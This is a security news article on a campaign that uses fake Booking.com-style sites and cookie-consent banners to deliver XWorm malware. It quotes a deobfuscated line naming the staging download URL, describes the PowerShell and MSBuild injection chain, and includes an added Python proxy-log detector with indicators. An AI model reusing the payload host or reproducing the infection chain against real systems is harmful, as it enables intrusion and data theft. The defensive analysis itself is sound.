Threat Actors Using Fake Travel Websites to Infect Users’ PCs with XWorm Malware
A sophisticated cybercrime campaign has emerged targeting holiday travelers through meticulously crafted fake travel booking websites designed to mimic legitimate platforms like Booking.com.
The operation, which gained significant momentum in the first quarter of 2025, represents an alarming evolution in social engineering tactics as cybercriminals exploit users’ habitual interactions with routine web elements to deliver malicious payloads.
The campaign’s primary weapon is XWorm, a potent remote access trojan (RAT) that grants attackers comprehensive control over infected systems while enabling extensive data theft capabilities.
What makes this particular campaign especially insidious is its exploitation of “click fatigue” – the common user behavior of quickly dismissing cookie consent banners without careful consideration.
By weaponizing these ubiquitous GDPR compliance elements, threat actors have transformed a routine browsing interaction into a malware distribution mechanism.
HP Wolf Security analysts identified this campaign early through analysis of domain registration patterns, noting that multiple malicious domains were registered simultaneously on February 23, 2025.
The researchers observed that this activity represents a significant departure from previous fake CAPTCHA-based campaigns, demonstrating the threat actors’ continuous innovation in social engineering methodologies to maximize infection rates.
The financial and operational impact of this campaign extends beyond individual victims, as XWorm’s capabilities include comprehensive system reconnaissance, credential harvesting, and persistent backdoor access.
Organizations face potential data breaches, intellectual property theft, and lateral movement within corporate networks when employees’ personal devices become compromised through these seemingly legitimate travel booking activities.
Infection Mechanism
The attack begins when potential victims navigate to fraudulent websites that closely replicate the appearance and functionality of legitimate travel booking platforms.
Upon accessing these sites, users encounter what appears to be a standard cookie consent banner, complete with familiar “Accept” and “Decline” options that have become second nature to most internet users.
When victims click the “Accept” button, the malicious banner initiates a JavaScript download while displaying a convincing loading animation.
The social engineering component becomes particularly effective at this stage, as the banner instructs users to click on the downloaded file to complete the cookie acceptance process – a request that appears reasonable given the context of GDPR compliance requirements.
The downloaded JavaScript file serves as the initial payload delivery mechanism, executing two PowerShell scripts in the background while masquerading as legitimate system processes.
These scripts cleverly employ the .mp4 file extension as a deception tactic, likely designed to evade detection by security analysts examining web proxy logs for suspicious PowerShell activity.
The PowerShell execution chain demonstrates sophisticated technical implementation. In the deobfuscated code, the script assigns the next-stage payload URL to an obfuscated variable name before downloading it:
$CNfID4AHhe = "http://185.7.214.54/js.exe"
This is followed by systematic .NET assembly loading and execution procedures.
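As an added defender-side example (not code from the article or from HP Wolf Security's analysis), the Python below scans constructed proxy log lines for the tradecraft described above: it flags downloads performed by a PowerShell user agent regardless of file extension, flags objects named .mp4 whose response content type is not video, and matches the staging host and payload name quoted from the deobfuscated script. The log format, the hostnames and every file name other than 185.7.214.54/js.exe are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample proxy log (pipe-separated; not real telemetry). Fields:
# timestamp|client_ip|method|url|status|response_content_type|user_agent
SAMPLE_LOG = """\
2025-02-24T10:01:02Z|10.0.0.12|GET|https://travel-lure.example/index.html|200|text/html|Mozilla/5.0 (Windows NT 10.0) Chrome/122.0
2025-02-24T10:01:09Z|10.0.0.12|GET|https://travel-lure.example/cookie-accept.js|200|application/javascript|Mozilla/5.0 (Windows NT 10.0) Chrome/122.0
2025-02-24T10:01:15Z|10.0.0.12|GET|http://185.7.214.54/stage.mp4|200|text/plain|Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1
2025-02-24T10:01:20Z|10.0.0.12|GET|http://185.7.214.54/js.exe|200|application/octet-stream|Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1
2025-02-24T10:05:00Z|10.0.0.33|GET|https://cdn.example/promo.mp4|200|video/mp4|Mozilla/5.0 (Windows NT 10.0) Chrome/122.0
"""

# Indicators quoted in the article (next-stage download URL from the deobfuscated script).
IOC_HOSTS = {"185.7.214.54"}
IOC_FILENAMES = {"js.exe"}
SCRIPT_HOST_UA = re.compile(r"powershell", re.IGNORECASE)


def check_entry(url: str, content_type: str, user_agent: str) -> list[str]:
    """Return the reasons one proxy entry is suspicious (empty list if none)."""
    reasons = []
    parsed = urlparse(url)
    path = parsed.path.lower()
    filename = path.rsplit("/", 1)[-1]
    # Rule 1: a script host, not a browser, fetched the object; the extension is irrelevant.
    if SCRIPT_HOST_UA.search(user_agent):
        reasons.append("download by PowerShell user agent")
    # Rule 2: the name claims a video but the server did not return video content.
    if path.endswith(".mp4") and not content_type.lower().startswith("video/"):
        reasons.append(f"extension/content-type mismatch (.mp4 served as {content_type})")
    # Rule 3: known indicators from the published analysis.
    if parsed.hostname in IOC_HOSTS:
        reasons.append(f"known staging host {parsed.hostname}")
    if filename in IOC_FILENAMES:
        reasons.append(f"known payload name {filename}")
    return reasons


def scan_proxy_log(log_text: str) -> dict[int, list[str]]:
    """Map 1-based line numbers of suspicious entries to their reasons."""
    hits = {}
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split("|")
        if len(fields) != 7:
            continue  # skip malformed lines instead of aborting the scan
        url, content_type, user_agent = fields[3], fields[5], fields[6]
        reasons = check_entry(url, content_type, user_agent)
        if reasons:
            hits[lineno] = reasons
    return hits
```

Rule 1 is the one that matters against this campaign: a renamed .mp4 still shows up as a PowerShell download, so the proxy-log blind spot the attackers rely on closes without knowing the file name in advance.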
The malware employs an intricate process injection technique, loading a .NET program that compiles another binary at runtime before injecting the final XWorm payload into a legitimate MSBuild.exe process.
This injection method represents a particularly advanced evasion technique, as the malware writes its components section by section into the target process memory space, effectively masking its presence within legitimate system processes.
The thread context manipulation and execution redirection ensure that XWorm operates seamlessly within the compromised environment while maintaining persistence through registry modifications and startup folder entries.
[Figure: the convincing lure website interface.]
[Figure: the deobfuscated JavaScript code structure that initiates the malicious download sequence, demonstrating the campaign’s technical sophistication and social engineering effectiveness.]